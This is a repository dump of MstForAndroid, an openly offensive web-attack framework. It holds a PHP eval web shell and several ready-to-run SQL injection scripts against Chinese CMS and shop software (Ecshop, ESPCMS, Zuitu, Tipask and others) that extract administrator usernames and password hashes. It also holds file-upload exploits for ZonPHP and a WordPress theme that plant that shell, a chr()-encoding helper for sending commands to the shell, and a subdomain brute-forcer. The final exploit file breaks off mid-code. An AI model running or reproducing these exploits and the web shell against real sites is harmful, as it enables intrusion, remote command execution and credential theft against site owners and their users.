├── libs
├── __init__.py
├── MstCache.pyc
├── MstColor.pyc
├── MstLoad.pyc
├── __init__.pyc
├── MstExploit.pyc
├── MstPlugin.pyc
├── MstUpdate.pyc
├── MultipartPostHandler.pyc
├── MstPayload.py
├── MstLoad.py
├── MstColor.py
├── MstUpdate.py
├── MultipartPostHandler.py
├── MstExploit.py
├── MstPlugin.py
└── MstCache.py
├── cache
├── payload.txt
├── multi.txt
└── exploit.txt
├── 1.jpg
├── 2.jpg
├── temp
└── evalshell.php
├── dicts
├── what_cms
│ ├── others.txt
│ ├── qibo.txt
│ ├── hdwiki.txt
│ ├── shopex.txt
│ ├── espcms.txt
│ ├── powereasy.txt
│ ├── phpcms.txt
│ ├── phpwind.txt
│ ├── dedecms.txt
│ ├── word-press.txt
│ └── dz.txt
└── sub_domain.lst
├── plugins
├── load
│ └── autofuck.py
├── exploit
│ ├── ms12_020.py
│ ├── phpweb_SQLInject.py
│ ├── 08cms_pays.php_SQLInject.py
│ ├── Qianbo_HitCount_SQLInject.py
│ ├── shopex_back_end_SQLInject.py
│ ├── FS_SetNextOptions.asp_Inject.py
│ ├── Qibo_cms_s_rpc.php_SQLInject.py
│ ├── xuas_news_more.asp_SQLInject.py
│ ├── dede5.7_download.php_getshell.py
│ ├── shopex_4.8.5_api.php_SQLInject.py
│ ├── southidc_News_search.asp_SQLInject.py
│ ├── easethink_payment.php_SQLInject.py
│ ├── B2BBuilder_comment.php_SQLInject.py
│ ├── espcms_search_SQLInject.py
│ ├── southidc_NewsType.asp_SQLInject.py
│ ├── ZonPHP_2.25_Remote_Code_Exec.py
│ ├── Ecshop_2.7_user.php_SQLInject.py
│ ├── Shop7z_v1.4_Sqlinject.py
│ ├── Zuitu_Call.php_SQLInject.py
│ ├── Tipask_2.0_SQLInject.py
│ ├── WordPress_Area53_theme_Arbitrary_File_Upload.py
│ ├── Shopex_sess_id_SQLInject.py
│ └── dede5.7_search.php_SQLInject.py
├── multi
│ ├── scan_ip_port.py
│ ├── sameIP_web[chinaz].py
│ ├── crack_sub_domain.py
│ └── what_cms.py
└── payload
│ └── php_cmdshell.py
├── README.md
└── mst.py
/libs/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/cache/payload.txt:
--------------------------------------------------------------------------------
1 | payload|php_cmdshell|payload/php_cmdshell
2 |
--------------------------------------------------------------------------------
/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/1.jpg
--------------------------------------------------------------------------------
/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/2.jpg
--------------------------------------------------------------------------------
/libs/MstCache.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/libs/MstCache.pyc
--------------------------------------------------------------------------------
/libs/MstColor.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/libs/MstColor.pyc
--------------------------------------------------------------------------------
/libs/MstLoad.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/libs/MstLoad.pyc
--------------------------------------------------------------------------------
/libs/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/libs/__init__.pyc
--------------------------------------------------------------------------------
/libs/MstExploit.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/libs/MstExploit.pyc
--------------------------------------------------------------------------------
/libs/MstPlugin.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/libs/MstPlugin.pyc
--------------------------------------------------------------------------------
/libs/MstUpdate.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/libs/MstUpdate.pyc
--------------------------------------------------------------------------------
/temp/evalshell.php:
--------------------------------------------------------------------------------
1 | evalShell.php
3 | #PASSWORD:mst
4 | @eval($_POST['mst']);
5 | ?>
--------------------------------------------------------------------------------
/dicts/what_cms/others.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/dicts/what_cms/others.txt
--------------------------------------------------------------------------------
/dicts/what_cms/qibo.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/dicts/what_cms/qibo.txt
--------------------------------------------------------------------------------
/plugins/load/autofuck.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/plugins/load/autofuck.py
--------------------------------------------------------------------------------
/plugins/exploit/ms12_020.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/plugins/exploit/ms12_020.py
--------------------------------------------------------------------------------
/libs/MultipartPostHandler.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/libs/MultipartPostHandler.pyc
--------------------------------------------------------------------------------
/plugins/multi/scan_ip_port.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/plugins/multi/scan_ip_port.py
--------------------------------------------------------------------------------
/plugins/payload/php_cmdshell.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/plugins/payload/php_cmdshell.py
--------------------------------------------------------------------------------
/plugins/exploit/phpweb_SQLInject.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/plugins/exploit/phpweb_SQLInject.py
--------------------------------------------------------------------------------
/plugins/multi/sameIP_web[chinaz].py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/plugins/multi/sameIP_web[chinaz].py
--------------------------------------------------------------------------------
/plugins/exploit/08cms_pays.php_SQLInject.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/plugins/exploit/08cms_pays.php_SQLInject.py
--------------------------------------------------------------------------------
/plugins/exploit/Qianbo_HitCount_SQLInject.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/plugins/exploit/Qianbo_HitCount_SQLInject.py
--------------------------------------------------------------------------------
/plugins/exploit/shopex_back_end_SQLInject.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/plugins/exploit/shopex_back_end_SQLInject.py
--------------------------------------------------------------------------------
/plugins/exploit/FS_SetNextOptions.asp_Inject.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/plugins/exploit/FS_SetNextOptions.asp_Inject.py
--------------------------------------------------------------------------------
/plugins/exploit/Qibo_cms_s_rpc.php_SQLInject.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/plugins/exploit/Qibo_cms_s_rpc.php_SQLInject.py
--------------------------------------------------------------------------------
/plugins/exploit/xuas_news_more.asp_SQLInject.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/plugins/exploit/xuas_news_more.asp_SQLInject.py
--------------------------------------------------------------------------------
/plugins/exploit/dede5.7_download.php_getshell.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/plugins/exploit/dede5.7_download.php_getshell.py
--------------------------------------------------------------------------------
/plugins/exploit/shopex_4.8.5_api.php_SQLInject.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/plugins/exploit/shopex_4.8.5_api.php_SQLInject.py
--------------------------------------------------------------------------------
/dicts/what_cms/hdwiki.txt:
--------------------------------------------------------------------------------
1 | /kaiyuanhome/images/logo.jpg::26089e2b5dc983e21c7e4ee7139e55e2::hdwiki
2 | /css/official.css::82b446b52df165e451d015f9b7c95822::hdwiki
--------------------------------------------------------------------------------
/plugins/exploit/southidc_News_search.asp_SQLInject.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xibijj/MstForAndroid/master/plugins/exploit/southidc_News_search.asp_SQLInject.py
--------------------------------------------------------------------------------
/dicts/what_cms/shopex.txt:
--------------------------------------------------------------------------------
1 | /asset/javascripts/mootools.js::e3381f8f7d0788dd149e68c4d00249dc::shopex
2 | /asset/javascripts/scripts.js::c43e4b278ea17f2cde3bfa9212c28b24::shopex
--------------------------------------------------------------------------------
/cache/multi.txt:
--------------------------------------------------------------------------------
1 | multi|crack_sub_domain|multi/crack_sub_domain
2 | multi|sameIP_web[chinaz]|multi/sameIP_web[chinaz]
3 | multi|scan_ip_port|multi/scan_ip_port
4 | multi|what_cms|multi/what_cms
5 |
--------------------------------------------------------------------------------
/dicts/what_cms/espcms.txt:
--------------------------------------------------------------------------------
1 | /api/uc.php::f4c65c2e278282b8f614f6bdc086e4a8::espcms
2 | /js/My97DatePicker/lang/en.js::0132b0df672d053d320458a937450b65::espcms
3 | /js/My97DatePicker/lang/en.js::71ed96d7a61bf1f078eadeaae518ab9c::espcms
--------------------------------------------------------------------------------
/dicts/what_cms/powereasy.txt:
--------------------------------------------------------------------------------
1 | /js/jquery.pack.js::e57fb6b9927bcef6bcef240a3ceb2cb8::powereasy
2 | /js/SiteCount.js::e57fb6b9927bcef6bcef240a3ceb2cb8::powereasy
3 | /t3/style/css/common/card.css::768184e902d7941211e4644d4aafbeb7::powereasy
--------------------------------------------------------------------------------
/dicts/what_cms/phpcms.txt:
--------------------------------------------------------------------------------
1 | modules/scan/functions/global.func.php::d41d8cd98f00b204e9800998ecf8427e::phpcms
statics/images/icon/error.png::c8c0d39f058f3b62e81effd218b16bf6::phpcms
phpcms/modules/scan/functions/global.func.php::d41d8cd98f00b204e9800998ecf8427e::phpcms
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | MstForAndroid
2 | =======
3 |
4 | MstForAndroid 原作者是江湖一刀,当时我想放到android平台上去跑。
5 |
6 | 当时刚学习python所以移植部分代码也很low!!!
7 |
8 | 使用方法请查看:http://www.freebuf.com/tools/18108.html
9 |
10 | By - Mr.x
11 |
12 | mail:coolxia@foxmail.com
13 |
14 | 2015.8.12
15 |
--------------------------------------------------------------------------------
/dicts/what_cms/phpwind.txt:
--------------------------------------------------------------------------------
1 | /res/js/dev/wind.js::7ad9ac3d647e00e12c615a06762430fe::phpwind
2 | /themes/site/default/images/logo.png::c2a75344349c39c7f4acaed8a7156293::phpwind
3 | /js/pw_ajax.js::8531a5f857019d7bdc00533728dfc9f6::phpwind
4 | /js/app_global.js::8531a5f857019d7bdc00533728dfc9f6::phpwind
--------------------------------------------------------------------------------
/dicts/what_cms/dedecms.txt:
--------------------------------------------------------------------------------
1 | /plus/img/face/1.gif::89fe2f5e0467ef10f066272d07e2de57::dedecms
2 | /include/code/datalist.utf-8.inc::b3f27da60b6302fcfeeb56105716ca7d::dedecms
3 | /include/js/jquery/ui.core.js::ec7d2e180b647f8ee80fd7370f340a0d::dedecms
4 | /include/js/jquery/jquery.js::518215c646beff570b8d9849429139d4::dedecms
--------------------------------------------------------------------------------
/dicts/what_cms/word-press.txt:
--------------------------------------------------------------------------------
1 | /wp-includes/js/jquery/jquery.js::fe633f13a47489e16d6d3b9065b20500::word-press
2 | /wp-includes/js/jquery/jquery.js?ver=1.10.::d3dd446e5ba92b8ffa78e596fda2c471::word-press
3 | /favicon.ico::f420dc2c7d90d7873a90d82cd7fde315::word-press
4 | /wp-includes/js/jquery/jquery-migrate.min.js::512b871a2830e44259bc3ce3343afcd0::word-press
5 | /wp-content/themes/daiphapinfo/images/ja.moomenu.js::f9ebcab64a388f8cac82dc25f654c287::word-press
6 | /wp-content/themes/daiphapinfo/images/PopupWindow.js::570fed3d8f8b447514ab3e987dc08f82::word-press
--------------------------------------------------------------------------------
/dicts/what_cms/dz.txt:
--------------------------------------------------------------------------------
1 | /favicon.ico::c028c4822428e83a358c60a93ef65381::dz x2.5
2 | /static/js/admincp.js::05e0eee21760347218cbf225fc1b601c::dz x2.5
3 | /static/js/md5.js::ef058f07a773acf03f6d2f7f6ecb68fd::dz x2.5 or x3.0
4 | /static/js/md5.js::26511efb3ce6f474b4dfddbebc4bef48::dz x2
5 | /forumdata/cache/common.js::62304be19d86e64eaf78f8cd610b38a8::dz 7.2
6 | /images/common/online_member.gif::e679735ca6f5ed898ba98e4433565003::dz 7.2
7 | /images/default/reply.gif::c00763eee9ef06799151a9ee0b18ab13::dz 1.0
8 | /images/default/collapsed_no.gif::34bc7136efaf8c351b22bacf46576edd::dz 1.0
--------------------------------------------------------------------------------
/plugins/exploit/easethink_payment.php_SQLInject.py:
--------------------------------------------------------------------------------
1 | class mstplugin:
2 | infos = [
3 | ['NAME','easethink_SQLInject(payment.php)'],
4 | ['AUTHOR','mst'],
5 | ['TIME','20131024'],
6 | ['WEB','http://mstoor.duapp.com']
7 | ]
8 | opts = [
9 | ['URL','localhost','REMOTE URL'],
10 | ['PORT','80','REMOTE URL-PORT'],
11 | ['PATH','/','REMOTE APP-PATH']
12 | ]
13 | def exploit(self):
14 | url = fuck.urlformate(URL,PORT,PATH)
15 | poc = "payment.php?act=return&class_name=-1' and (updatexml(1,concat(0x7c,(select concat(adm_name,0x3a,adm_password) from easethink_admin limit 1)),1))--"
16 | exp = url+poc
17 | try:
18 | tmp = fuck.urlget(exp).read()
19 | res = fuck.find(r'\:\w+[|]{1}\w+',tmp)
20 | if len(res)>0:
21 | color.cprint("[*] Exploit Successful !\n[*] %s"%res,GREEN)
22 | fuck.writelog("easethink_payment_sqli",URL+"::"+res)
23 | else:
24 | color.cprint("[!] Exploit False !",RED)
25 | except Exception,e:
26 | color.cprint("[!] Exploit False !CODE:%s"%e,RED)
27 |
28 |
--------------------------------------------------------------------------------
/plugins/multi/crack_sub_domain.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | class mstplugin:
3 | '''crack sub_domain'''
4 | infos = [
5 | ['Plugin','Web_pathscan'],
6 | ['Author','mst'],
7 | ['Update','2013/11/02'],
8 | ['site','http://mstoor.duapp.com']
9 | ]
10 | opts = [
11 | ['DOMAIN','google.com','Url'],
12 | ['SUBDIC','dicts/sub_domain.lst','dic path'],
13 | ['THREAD','10','start threads']
14 | ]
15 | def exploit(self):
16 | dicts=open(SUBDIC).readlines()
17 | color.cprint("SCANN %s =>SUB DOMAINS"%DOMAIN.upper(),YELLOW)
18 | color.cprint("===================="+"="*len(DOMAIN),GREY)
19 | def bb(dic):
20 | domain = dic.strip("\n")+"."+DOMAIN
21 | res = fuck.urltoip(domain)
22 | if res != False:
23 | log="%-35s %-25s"%(domain,res)
24 | color.cprint(log+"\n",GREEN,0)
25 | fuck.writelog('sub_domain_%s'%DOMAIN,log)
26 | else:
27 | color.cprint("%-35s %-25s\n"%(domain,"{NULL}"),RED,0)
28 | fuck.thread(bb,dicts,THREAD)
29 | color.cprint("[*] ALL SCAN DONE ! SAVE TO output/sub_domain_%s.log!"%DOMAIN,YELLOW)
30 |
--------------------------------------------------------------------------------
/plugins/exploit/B2BBuilder_comment.php_SQLInject.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
class mstplugin:
infos = [
['Plugin','B2BBuilder_comment.php_SQLInject'],
['Author','xfkxfk'],
['Update','2013/10/25'],
['Site','http://www.hackcto.com'],
]
opts = [
['URL','localhost','Target URL'],
['PATH','/','CMS Path'],
['PORT','80','Target Port']
]
def exploit(self):
url = fuck.urlformate(URL,PORT,PATH)
get_pass = '/comment.php?ctype=2&conid=16873%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x3A,user,0x3A,password,0x3A)%20from%20b2bbuilder_admin%20Order%20by%20user%20limit%200,1)%20)%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20`information_schema`.tables%20group%20by%20x)a)%20and%201=1'
url = url + get_pass
try:
color.cprint("[+] Sending exp ..",YELLOW)
res= fuck.urlget(url).read()
ok = fuck.find(r':\w+:\w+:',res)[0]
if len(ok)>0:
color.cprint("[*] Exploit Successful !",GREEN)
color.cprint("[*] %s"%ok,GREEN)
fuck.writelog("B2BBuilder_comment_php_sqli",URL+"::"+ok)
else:
color.cprint("[!] Exploit False !",RED)
except Exception,e:
color.cprint("[!] Exploit False ! CODE:%s"%e,RED)
--------------------------------------------------------------------------------
/plugins/exploit/espcms_search_SQLInject.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
class mstplugin:
'''ESPCMS_search_sqlInject'''
infos = [
['Plugin','espcms_search_SQLInject'],
['Author','xfkxfk'],
['Update','2013/10/25'],
['Site','http://www.hackcto.com'],
]
opts = [
['URL','localhost','Target URL'],
['PATH','/','CMS Path'],
['PORT','80','Target Port']
]
def exploit(self):
url = fuck.urlformate(URL,PORT,PATH)
get_pass = '/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23'
url = url + get_pass
try:
color.cprint("[+] Sending exp ..",YELLOW)
res= fuck.urlget(url).read()
ok = fuck.find(r'>\w+&\w+<',res)[0]
ok = ok[1:-1]
if len(ok)>0:
color.cprint("[*] Exploit Successful !",GREEN)
color.cprint("[*] %s"%ok,GREEN)
fuck.writelog("espcms_search_SQLI",URL+"::"+ok)
else:
color.cprint("[!] Exploit False !",RED)
except Exception,e:
color.cprint("[!] Exploit False ! CODE:%s"%e,RED)
--------------------------------------------------------------------------------
/plugins/exploit/southidc_NewsType.asp_SQLInject.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | class mstplugin:
3 | infos = [
4 | ['Plugin','SouthIDC NewsType.asp SqlInject Exp'],
5 | ['Author','mst'],
6 | ['Update','2013/10/20'],
7 | ['site','http://mstoor.duapp.com']
8 | ]
9 | opts = [
10 | ['URL','localhost','Url'],
11 | ['PATH','/','Cms path'],
12 | ['PORT','80','port']
13 | ]
14 | def exploit(self):
15 | url = fuck.urlformate(URL,PORT,PATH)
16 | exp = url+"NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='"
17 | color.cprint("[*] Sending exp..",YELLOW)
18 | ok = fuck.urlget(exp)
19 | if ok.getcode() == 200:
20 | tmp=fuck.find('[>]+\w+[|]+\w+[<]+',ok.read())
21 | if len(tmp)>0:
22 | color.cprint("[*] Exploit Successful !",GREEN)
23 | for i in range(len(tmp)):
24 | tmp[i] = tmp[i][1:len(tmp[i])-1]
25 | color.cprint("[%s] %s"%(i,tmp[i]),GREEN)
26 | fuck.writelog("southidc_newstype_sqli",URL+"::"+tmp[i])
27 | else:
28 | color.cprint("[!] TARGET NO VULNERABLE !",RED)
29 | else:
30 | color.cprint("[!] EXPLOIT FALSE ! CODE:%s"%ok.getcode(),RED)
31 |
--------------------------------------------------------------------------------
/plugins/exploit/ZonPHP_2.25_Remote_Code_Exec.py:
--------------------------------------------------------------------------------
1 |
2 | class mstplugin:
3 | infos = [
4 | ['NAME','ZonPHP 2.25 - Remote Code Execution (RCE) Vulnerability'],
5 | ['AUTHOR','mst'],
6 | ['UPTIME','20131027'],
7 | ['WEBSITE','http://mstoor.duapp.com']
8 | ]
9 | opts = [
10 | ['URL','localhost','target url'],
11 | ['PORT','80','target port'],
12 | ['PATH','/','target app-path'],
13 | ['PAYLOAD','php_cmdshell','you can change it :)']
14 | ]
15 | def exploit(self):
16 | url = fuck.urlformate(URL,PORT,PATH)
17 | shell = ""
18 | shurl = url+"mstshell.php"
19 | shpwd = "1"
20 | exp = url+"ofc/ofc_upload_image.php?name=mstshell.php"
21 | try:
22 | color.cprint("[+] Sending exp..",YELLOW)
23 | res=fuck.php_post(exp,shell)
24 | check=fuck.urlget(shurl)
25 | if check.getcode() == 200:
26 | color.cprint("[*] Exploit Successful !",CYAN)
27 | color.cprint("[-] Shell: %s\n[-] Paswd: %s"%(shurl,shpwd),GREEN)
28 | fuck.writelog("ZonPHP_2.25",url+"::"+shurl+"::"+shpwd)
29 | fuck.topayload(PAYLOAD,[shurl,shpwd])
30 | else:
31 | color.cprint("[!] Exploit False :%s"%check.getcode(),RED)
32 | except Exception,e:
33 | color.cprint("[!] ERR:%s"%e,RED)
34 |
--------------------------------------------------------------------------------
/plugins/exploit/Ecshop_2.7_user.php_SQLInject.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | class mstplugin:
3 | infos = [
4 | ['Plugin','ecshop_2.7_user.php_SQLInject'],
5 | ['Author','Mr.x'],
6 | ['Update','2013/11/5'],
7 | ['QQ','414106785']
8 | ]
9 | opts = [
10 | ['URL','localhost','Url'],
11 | ['PATH','/','Cms path'],
12 | ['PORT','80','port']
13 | ]
14 | def exploit(self):
15 | url = fuck.urlformate(URL,PORT,PATH)
16 | exp_name = url+"/user.php?act=is_registered&username=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x7c,password,0x5d%29%20FROM%20ecs_admin_user%20limit%202,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23"
17 | color.cprint("[*] Inject ..",YELLOW)
18 | ok = fuck.urlget(exp_name)
19 | if ok.getcode() == 200:
20 | tmp=fuck.find("\w+[|]\w{32}",ok.read())
21 | if len(tmp)>0:
22 | color.cprint("[*] Exploit Successful !",GREEN)
23 | color.cprint('[*] '+tmp[0],GREEN)
24 | fuck.writelog("ecshop_2.7_user.php_SQLInject",URL+"::"+tmp[0])
25 | else:
26 | color.cprint("[!] TARGET NO VULNERABLE !",RED)
27 | else:
28 | color.cprint("[!] EXPLOIT FALSE ! CODE:%s"%ok.getcode(),RED)
29 |
--------------------------------------------------------------------------------
/plugins/exploit/Shop7z_v1.4_Sqlinject.py:
--------------------------------------------------------------------------------
1 |
2 | # -*- coding: utf-8 -*-
3 | '''Mst=>exploit=>plugin'''
4 | class mstplugin:
5 | '''shop7z_v1.4_Sqlinject'''
6 | infos = [
7 | ['Plugin','shop7z_v1.4_Sqlinject'],
8 | ['Author','demon&roker'],
9 | ['Update','2013/10/29'],
10 | ['Site','http://www.dawner.info'],
11 | ]
12 | opts = [
13 | ['URL','localhost','Target URL'],
14 | ['PATH','/','CMS Path'],
15 | ['PORT','80','Target Port']
16 | ]
17 | def exploit(self):
18 | url = fuck.urlformate(URL,PORT,PATH)
19 | get_pass = 'show.asp?pkid=4820%20and%201%20=%202%20union%20select%201,2,3,4,5,6,7,s_user,9,10,11,12,s_pwd,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%20from%20admin'
20 | url = url + get_pass
21 | try:
22 | color.cprint("[+] Sending exp ..",YELLOW)
23 | res= fuck.urlget(url).read()
24 | ok = fuck.find(r'>\w+<',res)[0]
25 | k = fuck.find(r'>\w+\s<',res)[0]
26 | ok = ok[1:-1]
27 | k = k[1:-1]
28 | color.cprint("[*] Exploit Successful !",GREEN)
29 | color.cprint("[*] user:%s"%ok,GREEN)
30 | color.cprint("[+] pass:%s"%k,BLUE)
31 | fuck.writelog("shop7z)1.4_sqli",URL+"::"+ok+"::"+k)
32 | except Exception,e:
33 | color.cprint("[!] Exploit False ! CODE:%s"%e,RED)
34 |
35 |
36 |
37 |
38 |
39 |
40 |
--------------------------------------------------------------------------------
/libs/MstPayload.py:
--------------------------------------------------------------------------------
1 | '''
2 | mst=>payload=>fuck=>functions
3 | '''
4 |
5 | class fuck:
6 | '''functions for payload'''
7 | def phpdecode(self,phpcode):
8 | '''decode php code'''
9 | code="@eVAl("
10 | for p in phpcode:
11 | code+="cHR(%s)."%ord(p)
12 | code=code[:len(code)-1]
13 | code+=");"
14 | return code
15 |
16 | def urlpost(self,url,value):
17 | try:
18 | data=urllib.urlencode(value)
19 | user_agent='Mozilla/4.0 (commpatible;MSIE 5.5;Windows NT)'
20 | headers={'User-Agent':user_agent}
21 | req=urllib2.Request(url,data,headers)
22 | return urllib2.urlopen(req)
23 | except:
24 | return "false"
25 |
26 | def urlget(self,url):
27 | try:
28 | return urllib2.urlopen(url)
29 | except:
30 | return "false"
31 |
32 | def getres(self,url,pwd,c):
33 | '''get shell's response'''
34 | try:
35 | code = 'ecHO "{MST}";'
36 | code+= c
37 | code+= 'eChO "{MST}";'
38 | code = self.phpdecode(code)
39 | value= {pwd:code}
40 | tmp = self.urlpost(url,value).read()
41 | tmp = tmp.split("{MST}")[1]
42 | return tmp
43 | except Exception,e:
44 | return e
45 |
46 | if __name__=="__main__":
47 | print __doc__
48 | else:
49 | global payloadfuck
50 | payloadfuck=fuck()
51 |
--------------------------------------------------------------------------------
/plugins/exploit/Zuitu_Call.php_SQLInject.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | class mstplugin:
3 | '''Zuitu sqlinject'''
4 | infos = [
5 | ['Plugin','Zuitu call.php SqlInject Exp'],
6 | ['AUTHOR','teamtopkarl'],
7 | ['Update','2013/10/25'],
8 | ['site','http://hi.baidu.com/teamtopkarl']
9 | ]
10 | opts = [
11 | ['URL','www.xxxxxx.com','Url'],
12 | ['PATH','/api/','Cms path'],
13 | ['PORT','80','port']
14 | ]
15 | def exploit(self):
16 | '''start exploit'''
17 | url = fuck.urlformate(URL,PORT,PATH)
18 | exp = url+"call.php?action=query&num=j8g'%29/**/union/**/select/**/1,2,3,concat(username,0x7e,password),5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/user/**/limit/**/0,1%23"
19 | color.cprint("[*] Sending exp..",YELLOW)
20 | ok = fuck.urlget(exp)
21 | if ok.getcode() == 200:
22 | tmp=fuck.find('[>]+\w+[~]+\w+[<]+',ok.read())
23 | if len(tmp)>0:
24 | color.cprint("[*] Exploit Successful !",GREEN)
25 | i=1
26 | for res in tmp:
27 | res=res[1:len(res)-1]
28 | color.cprint("[%s] %s"%(i,res),GREEN)
29 | fuck.writelog("zuitu_call_php_sqli",URL+"::"+res)
30 | i+=1
31 | else:
32 | color.cprint("[!] TARGET NO VULNERABLE !",RED)
33 | else:
34 | color.cprint("[!] EXPLOIT FALSE ! CODE:%s"%ok.getcode(),RED)
35 |
--------------------------------------------------------------------------------
/plugins/exploit/Tipask_2.0_SQLInject.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | class mstplugin:
3 | infos = [
4 | ['Plugin','Tipask_2.0_SQLInject'],
5 | ['Author','Mr.x'],
6 | ['Update','2013/10/31'],
7 | ['QQ','414106785']
8 | ]
9 | opts = [
10 | ['URL','localhost','Url'],
11 | ['PATH','/','Cms path'],
12 | ['PORT','80','port']
13 | ]
14 | def exploit(self):
15 | url = fuck.urlformate(URL,PORT,PATH)
16 | exp_name = url+"/?question/ajaxsearch/%27%20%55%4E%49%4F%4E%20%53%45%4C%45%43%54%20%31%2C%32%2C%33%2C%34%2C%35%2C%36%2C%37%2C%38%2C%63%6F%6E%63%61%74%28%75%73%65%72%6E%61%6D%65%2C%63%68%61%72%28%30%78%33%64%29%2C%70%61%73%73%77%6F%72%64%29%2C%31%30%2C%31%31%2C%31%32%2C%31%33%2C%31%34%2C%31%35%2C%31%36%2C%31%37%2C%31%38%2C%31%39%2C%32%30%2C%32%31%20%66%72%6F%6D%20%61%73%6B%5F%75%73%65%72%20%77%68%65%72%65%20%67%72%6F%75%70%69%64%3D%31%23"
17 | color.cprint("[*] Inject user..",YELLOW)
18 | ok = fuck.urlget(exp_name)
19 | if ok.getcode() == 200:
20 | tmp=fuck.find("\w+=\w{32}",ok.read())
21 | if len(tmp)>0:
22 | color.cprint("[*] Exploit Successful !",GREEN)
23 | for x in tmp:
24 | color.cprint('[*] '+x,GREEN)
25 | fuck.writelog("Tipask_2.0_SQLInject",URL+"::"+x)
26 | else:
27 | color.cprint("[!] TARGET NO VULNERABLE !",RED)
28 | else:
29 | color.cprint("[!] EXPLOIT FALSE ! CODE:%s"%ok.getcode(),RED)
30 |
--------------------------------------------------------------------------------
/plugins/exploit/WordPress_Area53_theme_Arbitrary_File_Upload.py:
--------------------------------------------------------------------------------
1 | class mstplugin:
2 | infos = [
3 | ['NAME','WordPress Area53 theme Arbitrary File Upload'],
4 | ['AUTHOR','mst'],
5 | ['WEBSITE','http://mstoor.duapp.com'],
6 | ['UPTIME','20131027']
7 | ]
8 | opts = [
9 | ['URL','127.0.0.1','target url'],
10 | ['PORT','80','target port'],
11 | ['PATH','/','target wp-path'],
12 | ['UPFILE','evalshell.php','file to upload(dir:temp)'],
13 | ['PAYLOAD','php_cmdshell','You can change it=false :)']
14 | ]
15 | def exploit(self):
16 | url = fuck.urlformate(URL,PORT,PATH)
17 | tmp = time.strftime('%Y/%m',time.localtime(time.time()))
18 | vul = url+"wp-content/themes/area53/framework/_scripts/valums_uploader/php.php"
19 | shl = url+"wp-content/uploads/%s/%s"%(tmp,UPFILE)
20 | dat = {"qqfile":open("temp/%s"%UPFILE,"rb")}
21 | pwd = "mst"#default
22 | try:
23 | color.cprint("[*] TRY UPFILE..",YELLOW)
24 | fuck.urlupload(vul,dat)
25 | color.cprint("[+] CHECK IF FILE UPLOADED...",YELLOW)
26 | check = fuck.urlget(shl).getcode()
27 | if check == 200:
28 | color.cprint("[*] Exploit Successful !",YELLOW)
29 | color.cprint("[-] SHELL: %s\n[-] PASS : %s"%(shl,pwd),GREEN)
30 | fuck.writelog("wordpress_area53_file_upload",shl+"::"+pwd)
31 | else:
